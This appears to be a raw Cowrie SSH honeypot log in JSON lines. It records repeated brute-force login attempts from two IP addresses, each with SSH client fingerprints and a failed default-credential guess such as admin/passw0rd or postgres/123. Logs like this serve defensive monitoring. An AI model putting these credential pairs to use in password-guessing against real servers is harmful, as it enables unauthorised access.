{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57866,"dst_ip":"1.2.3.4","dst_port":22,"session":"df80e8188b49","protocol":"ssh","message":"New connection: 212.227.125.160:57866 (1.2.3.4:22) [session: df80e8188b49]","sensor":"my-vps","timestamp":"2025-08-26T22:00:30.649099Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:00:30.650257Z","src_ip":"212.227.125.160","session":"df80e8188b49"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:00:31.020182Z","src_ip":"212.227.125.160","session":"df80e8188b49"}
{"eventid":"cowrie.login.failed","username":"paas","password":"paas","message":"login attempt [paas/paas] failed","sensor":"my-vps","timestamp":"2025-08-26T22:00:31.541698Z","src_ip":"212.227.125.160","session":"df80e8188b49"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:00:32.794548Z","src_ip":"212.227.125.160","session":"df80e8188b49"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53254,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ea54343f867","protocol":"ssh","message":"New connection: 212.227.125.160:53254 (1.2.3.4:22) [session: 7ea54343f867]","sensor":"my-vps","timestamp":"2025-08-26T22:00:37.142861Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:00:37.170780Z","src_ip":"212.227.125.160","session":"7ea54343f867"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:00:37.220503Z","src_ip":"212.227.125.160","session":"7ea54343f867"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy","message":"login attempt [deploy/deploy] failed","sensor":"my-vps","timestamp":"2025-08-26T22:00:37.547311Z","src_ip":"212.227.125.160","session":"7ea54343f867"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:00:38.606230Z","src_ip":"212.227.125.160","session":"7ea54343f867"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48640,"dst_ip":"1.2.3.4","dst_port":22,"session":"b008993fcca0","protocol":"ssh","message":"New connection: 212.227.125.160:48640 (1.2.3.4:22) [session: b008993fcca0]","sensor":"my-vps","timestamp":"2025-08-26T22:00:43.181234Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:00:43.182962Z","src_ip":"212.227.125.160","session":"b008993fcca0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:00:43.242492Z","src_ip":"212.227.125.160","session":"b008993fcca0"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123","message":"login attempt [postgres/123] failed","sensor":"my-vps","timestamp":"2025-08-26T22:00:43.416081Z","src_ip":"212.227.125.160","session":"b008993fcca0"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:00:44.472495Z","src_ip":"212.227.125.160","session":"b008993fcca0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44026,"dst_ip":"1.2.3.4","dst_port":22,"session":"c69a7425ae16","protocol":"ssh","message":"New connection: 212.227.125.160:44026 (1.2.3.4:22) [session: c69a7425ae16]","sensor":"my-vps","timestamp":"2025-08-26T22:00:48.890531Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:00:49.075907Z","src_ip":"212.227.125.160","session":"c69a7425ae16"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:00:49.077214Z","src_ip":"212.227.125.160","session":"c69a7425ae16"}
{"eventid":"cowrie.login.failed","username":"www","password":"www","message":"login attempt [www/www] failed","sensor":"my-vps","timestamp":"2025-08-26T22:00:49.631361Z","src_ip":"212.227.125.160","session":"c69a7425ae16"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:00:50.677433Z","src_ip":"212.227.125.160","session":"c69a7425ae16"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39412,"dst_ip":"1.2.3.4","dst_port":22,"session":"25cad0226fab","protocol":"ssh","message":"New connection: 212.227.125.160:39412 (1.2.3.4:22) [session: 25cad0226fab]","sensor":"my-vps","timestamp":"2025-08-26T22:00:54.267547Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:00:54.268352Z","src_ip":"212.227.125.160","session":"25cad0226fab"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:00:54.318454Z","src_ip":"212.227.125.160","session":"25cad0226fab"}
{"eventid":"cowrie.login.failed","username":"jms","password":"111111","message":"login attempt [jms/111111] failed","sensor":"my-vps","timestamp":"2025-08-26T22:00:54.998845Z","src_ip":"212.227.125.160","session":"25cad0226fab"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:00:56.058545Z","src_ip":"212.227.125.160","session":"25cad0226fab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41748,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa6d9bef9a79","protocol":"ssh","message":"New connection: 212.227.235.229:41748 (1.2.3.4:22) [session: fa6d9bef9a79]","sensor":"my-vps","timestamp":"2025-08-26T22:00:58.860595Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34804,"dst_ip":"1.2.3.4","dst_port":22,"session":"146df74980fe","protocol":"ssh","message":"New connection: 212.227.125.160:34804 (1.2.3.4:22) [session: 146df74980fe]","sensor":"my-vps","timestamp":"2025-08-26T22:01:00.330258Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:01:00.336219Z","src_ip":"212.227.125.160","session":"146df74980fe"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:01:00.381223Z","src_ip":"212.227.125.160","session":"146df74980fe"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"123456","message":"login attempt [nginx/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T22:01:00.577485Z","src_ip":"212.227.125.160","session":"146df74980fe"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:01:01.320497Z","src_ip":"212.227.235.229","session":"fa6d9bef9a79"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T22:01:01.321502Z","src_ip":"212.227.235.229","session":"fa6d9bef9a79"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:01:01.629261Z","src_ip":"212.227.125.160","session":"146df74980fe"}
{"eventid":"cowrie.login.failed","username":"admin","password":"passw0rd","message":"login attempt [admin/passw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T22:01:05.349473Z","src_ip":"212.227.235.229","session":"fa6d9bef9a79"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58424,"dst_ip":"1.2.3.4","dst_port":22,"session":"eec6129030d3","protocol":"ssh","message":"New connection: 212.227.125.160:58424 (1.2.3.4:22) [session: eec6129030d3]","sensor":"my-vps","timestamp":"2025-08-26T22:01:05.635430Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:01:05.636460Z","src_ip":"212.227.125.160","session":"eec6129030d3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:01:05.701154Z","src_ip":"212.227.125.160","session":"eec6129030d3"}
{"eventid":"cowrie.login.failed","username":"wso2","password":"wso2","message":"login attempt [wso2/wso2] failed","sensor":"my-vps","timestamp":"2025-08-26T22:01:07.380538Z","src_ip":"212.227.125.160","session":"eec6129030d3"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:01:07.752664Z","src_ip":"212.227.235.229","session":"fa6d9bef9a79"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:01:08.432790Z","src_ip":"212.227.125.160","session":"eec6129030d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53810,"dst_ip":"1.2.3.4","dst_port":22,"session":"adb5ef7de4b8","protocol":"ssh","message":"New connection: 212.227.125.160:53810 (1.2.3.4:22) [session: adb5ef7de4b8]","sensor":"my-vps","timestamp":"2025-08-26T22:01:11.574634Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:01:11.575987Z","src_ip":"212.227.125.160","session":"adb5ef7de4b8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:01:11.637076Z","src_ip":"212.227.125.160","session":"adb5ef7de4b8"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"oscar","message":"login attempt [oscar/oscar] failed","sensor":"my-vps","timestamp":"2025-08-26T22:01:11.894831Z","src_ip":"212.227.125.160","session":"adb5ef7de4b8"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:01:12.954459Z","src_ip":"212.227.125.160","session":"adb5ef7de4b8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49198,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f7003c717b6","protocol":"ssh","message":"New connection: 212.227.125.160:49198 (1.2.3.4:22) [session: 8f7003c717b6]","sensor":"my-vps","timestamp":"2025-08-26T22:01:17.490107Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:01:17.491189Z","src_ip":"212.227.125.160","session":"8f7003c717b6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:01:17.541088Z","src_ip":"212.227.125.160","session":"8f7003c717b6"}
{"eventid":"cowrie.login.failed","username":"alex","password":"alex","message":"login attempt [alex/alex] failed","sensor":"my-vps","timestamp":"2025-08-26T22:01:17.692530Z","src_ip":"212.227.125.160","session":"8f7003c717b6"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:01:18.771835Z","src_ip":"212.227.125.160","session":"8f7003c717b6"}
